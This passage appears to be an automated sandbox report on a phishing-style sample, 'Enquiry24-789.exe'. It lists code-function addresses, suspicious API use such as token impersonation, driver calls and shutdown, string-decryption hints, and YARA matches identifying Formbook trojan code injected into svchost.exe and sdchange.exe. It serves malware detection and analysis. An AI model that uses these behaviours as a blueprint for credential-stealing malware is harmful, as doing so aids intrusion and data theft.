Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B3010 NtOpenDirectoryObject, 5_2_046B3010
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B3090 NtSetValueKey, 5_2_046B3090
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B3D70 NtOpenThread, 5_2_046B3D70
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B3D10 NtOpenProcessToken, 5_2_046B3D10
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_02568EC0 NtCreateFile, 5_2_02568EC0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_02569340 NtAllocateVirtualMemory, 5_2_02569340
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_02569030 NtReadFile, 5_2_02569030
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_02569130 NtDeleteFile, 5_2_02569130
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_025691E0 NtClose, 5_2_025691E0
Contains functionality to communicate with device drivers
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C3D5EB: CreateFileW,DeviceIoControl,CloseHandle, 0_2_00C3D5EB
Contains functionality to launch a process as a different user
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C31201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 0_2_00C31201
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C3E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 0_2_00C3E8F6
Detected potential crypto function
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C42046 0_2_00C42046
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BD8060 0_2_00BD8060
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C38298 0_2_00C38298
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C0E4FF 0_2_00C0E4FF
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C0676B 0_2_00C0676B
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C64873 0_2_00C64873
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BFCAA0 0_2_00BFCAA0
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BDCAF0 0_2_00BDCAF0
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BECC39 0_2_00BECC39
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C06DD9 0_2_00C06DD9
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BD91C0 0_2_00BD91C0
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BEB119 0_2_00BEB119
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BF1394 0_2_00BF1394
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BF1706 0_2_00BF1706
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BF781B 0_2_00BF781B
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BF19B0 0_2_00BF19B0
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BD7920 0_2_00BD7920
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BE997D 0_2_00BE997D
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BF7A4A 0_2_00BF7A4A
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BF7CA7 0_2_00BF7CA7
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BF1C77 0_2_00BF1C77
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C09EEE 0_2_00C09EEE
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C5BE44 0_2_00C5BE44
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BF1F32 0_2_00BF1F32
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_02383630 0_2_02383630
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00418C9B 2_2_00418C9B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040E859 2_2_0040E859
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040E85B 2_2_0040E85B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00401000 2_2_00401000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004038C8 2_2_004038C8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0042F32B 2_2_0042F32B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004033D8 2_2_004033D8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00401560 2_2_00401560
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004105B3 2_2_004105B3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004105BB 2_2_004105BB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00416E7B 2_2_00416E7B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00416E06 2_2_00416E06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00402F68 2_2_00402F68
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004107DB 2_2_004107DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05440535 2_2_05440535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05500591 2_2_05500591
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054F2446 2_2_054F2446
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E4420 2_2_054E4420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054EE4F6 2_2_054EE4F6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05464750 2_2_05464750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05440770 2_2_05440770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543C7C0 2_2_0543C7C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0545C6E0 2_2_0545C6E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054C8158 2_2_054C8158
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05430100 2_2_05430100
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054DA118 2_2_054DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054F81CC 2_2_054F81CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054F41A2 2_2_054F41A2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_055001AA 2_2_055001AA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D2000 2_2_054D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054FA352 2_2_054FA352
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0544E3F0 2_2_0544E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_055003E6 2_2_055003E6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E0274 2_2_054E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054C02C0 2_2_054C02C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0544AD00 2_2_0544AD00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054DCD1F 2_2_054DCD1F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543ADE0 2_2_0543ADE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05458DBF 2_2_05458DBF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05440C00 2_2_05440C00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05430CF2 2_2_05430CF2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E0CB5 2_2_054E0CB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B4F40 2_2_054B4F40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05482F28 2_2_05482F28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05460F30 2_2_05460F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E2F30 2_2_054E2F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05432FC8 2_2_05432FC8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0544CFE0 2_2_0544CFE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054BEFA0 2_2_054BEFA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05440E59 2_2_05440E59
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054FEE26 2_2_054FEE26
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054FEEDB 2_2_054FEEDB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05452E90 2_2_05452E90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054FCE93 2_2_054FCE93
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05456962 2_2_05456962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054429A0 2_2_054429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0550A9A6 2_2_0550A9A6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0544A840 2_2_0544A840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05442840 2_2_05442840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546E8F0 2_2_0546E8F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054268B8 2_2_054268B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054FAB40 2_2_054FAB40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054F6BD7 2_2_054F6BD7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543EA80 2_2_0543EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054F7571 2_2_054F7571
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_055095C3 2_2_055095C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054DD5B0 2_2_054DD5B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05431460 2_2_05431460
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054FF43F 2_2_054FF43F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054FF7B0 2_2_054FF7B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05485630 2_2_05485630
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054F16CC 2_2_054F16CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0547516C 2_2_0547516C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542F172 2_2_0542F172
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0550B16B 2_2_0550B16B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0544B1B0 2_2_0544B1B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054EF0CC 2_2_054EF0CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054470C0 2_2_054470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054F70E9 2_2_054F70E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054FF0E0 2_2_054FF0E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542D34C 2_2_0542D34C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054F132D 2_2_054F132D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0548739A 2_2_0548739A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0545B2C0 2_2_0545B2C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E12ED 2_2_054E12ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054452A0 2_2_054452A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05443D40 2_2_05443D40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054F1D5A 2_2_054F1D5A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054F7D73 2_2_054F7D73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0545FDC0 2_2_0545FDC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B9C32 2_2_054B9C32
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054FFCF2 2_2_054FFCF2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054FFF09 2_2_054FFF09
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05403FD2 2_2_05403FD2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05403FD5 2_2_05403FD5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05441F92 2_2_05441F92
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054FFFB1 2_2_054FFFB1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05449EB0 2_2_05449EB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05449950 2_2_05449950
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0545B950 2_2_0545B950
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D5910 2_2_054D5910
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054AD800 2_2_054AD800
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054438E0 2_2_054438E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054FFB76 2_2_054FFB76
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B5BF0 2_2_054B5BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0547DBF9 2_2_0547DBF9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0545FB80 2_2_0545FB80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054FFA49 2_2_054FFA49
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054F7A46 2_2_054F7A46
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B3A6C 2_2_054B3A6C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054EDAC6 2_2_054EDAC6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054DDAAC 2_2_054DDAAC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05485AA0 2_2_05485AA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E1AA3 2_2_054E1AA3
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04732446 5_2_04732446
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04724420 5_2_04724420
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0472E4F6 5_2_0472E4F6
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04680535 5_2_04680535
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04740591 5_2_04740591
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0469C6E0 5_2_0469C6E0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04680770 5_2_04680770
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046A4750 5_2_046A4750
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0467C7C0 5_2_0467C7C0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04712000 5_2_04712000
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04708158 5_2_04708158
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04670100 5_2_04670100
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0471A118 5_2_0471A118
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_047381CC 5_2_047381CC
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_047341A2 5_2_047341A2
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_047401AA 5_2_047401AA
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04720274 5_2_04720274
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0468820D 5_2_0468820D
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_047002C0 5_2_047002C0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0473A352 5_2_0473A352
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_047403E6 5_2_047403E6
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0468E3F0 5_2_0468E3F0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04680C00 5_2_04680C00
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04670CF2 5_2_04670CF2
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04720CB5 5_2_04720CB5
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0468AD00 5_2_0468AD00
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0471CD1F 5_2_0471CD1F
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0467ADE0 5_2_0467ADE0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04698DBF 5_2_04698DBF
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04680E59 5_2_04680E59
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0473EE26 5_2_0473EE26
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0473EEDB 5_2_0473EEDB
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0473CE93 5_2_0473CE93
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04692E90 5_2_04692E90
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046F4F40 5_2_046F4F40
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04722F30 5_2_04722F30
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046C2F28 5_2_046C2F28
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046A0F30 5_2_046A0F30
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0468CFE0 5_2_0468CFE0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04672FC8 5_2_04672FC8
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046FEFA0 5_2_046FEFA0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0468A840 5_2_0468A840
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04682840 5_2_04682840
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046AE8F0 5_2_046AE8F0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046668B8 5_2_046668B8
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04696962 5_2_04696962
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046829A0 5_2_046829A0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0474A9A6 5_2_0474A9A6
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0467EA80 5_2_0467EA80
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0473AB40 5_2_0473AB40
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04736BD7 5_2_04736BD7
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04671460 5_2_04671460
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0473F43F 5_2_0473F43F
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04737571 5_2_04737571
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_047495C3 5_2_047495C3
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0471D5B0 5_2_0471D5B0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046C5630 5_2_046C5630
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_047316CC 5_2_047316CC
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0473F7B0 5_2_0473F7B0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0473F0E0 5_2_0473F0E0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_047370E9 5_2_047370E9
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046870C0 5_2_046870C0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0472F0CC 5_2_0472F0CC
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B516C 5_2_046B516C
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0466F172 5_2_0466F172
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0474B16B 5_2_0474B16B
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0468B1B0 5_2_0468B1B0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_047212ED 5_2_047212ED
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0469B2C0 5_2_0469B2C0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046852A0 5_2_046852A0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0466D34C 5_2_0466D34C
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0473132D 5_2_0473132D
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046C739A 5_2_046C739A
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046F9C32 5_2_046F9C32
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0473FCF2 5_2_0473FCF2
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04737D73 5_2_04737D73
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04683D40 5_2_04683D40
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04731D5A 5_2_04731D5A
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0469FDC0 5_2_0469FDC0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04689EB0 5_2_04689EB0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0473FF09 5_2_0473FF09
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04643FD5 5_2_04643FD5
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04643FD2 5_2_04643FD2
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0473FFB1 5_2_0473FFB1
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04681F92 5_2_04681F92
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046ED800 5_2_046ED800
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046838E0 5_2_046838E0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04689950 5_2_04689950
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0469B950 5_2_0469B950
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04715910 5_2_04715910
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046F3A6C 5_2_046F3A6C
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04737A46 5_2_04737A46
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0473FA49 5_2_0473FA49
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0472DAC6 5_2_0472DAC6
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046C5AA0 5_2_046C5AA0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04721AA3 5_2_04721AA3
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0471DAAC 5_2_0471DAAC
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0473FB76 5_2_0473FB76
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046BDBF9 5_2_046BDBF9
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046F5BF0 5_2_046F5BF0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0469FB80 5_2_0469FB80
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_02551AB0 5_2_02551AB0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0254CA90 5_2_0254CA90
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0254CA88 5_2_0254CA88
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0254CCB0 5_2_0254CCB0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0254AD30 5_2_0254AD30
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0254AD2E 5_2_0254AD2E
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_025532DB 5_2_025532DB
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_02553350 5_2_02553350
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_02555170 5_2_02555170
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0256B800 5_2_0256B800
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0452E444 5_2_0452E444
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0452E563 5_2_0452E563
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0452E8FC 5_2_0452E8FC
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0452D968 5_2_0452D968
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: String function: 00BEF9F2 appears 40 times
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: String function: 00BF0A30 appears 46 times
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: String function: 00BD9CB3 appears 31 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 05487E54 appears 111 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 054AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0542B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 054BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 05475130 appears 58 times
Source: C:\Windows\SysWOW64\sdchange.exe Code function: String function: 046B5130 appears 58 times
Source: C:\Windows\SysWOW64\sdchange.exe Code function: String function: 046EEA12 appears 86 times
Source: C:\Windows\SysWOW64\sdchange.exe Code function: String function: 0466B970 appears 280 times
Source: C:\Windows\SysWOW64\sdchange.exe Code function: String function: 046FF290 appears 105 times
Source: C:\Windows\SysWOW64\sdchange.exe Code function: String function: 046C7E54 appears 111 times
Sample file is different than original file name gathered from version info
Source: Enquiry24-789.exe, 00000000.00000003.2039230118.000000000430D000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Enquiry24-789.exe
Source: Enquiry24-789.exe, 00000000.00000003.2039948835.0000000004163000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Enquiry24-789.exe
Uses 32bit PE files
Source: Enquiry24-789.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Yara signature match
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.3274136665.0000000004420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
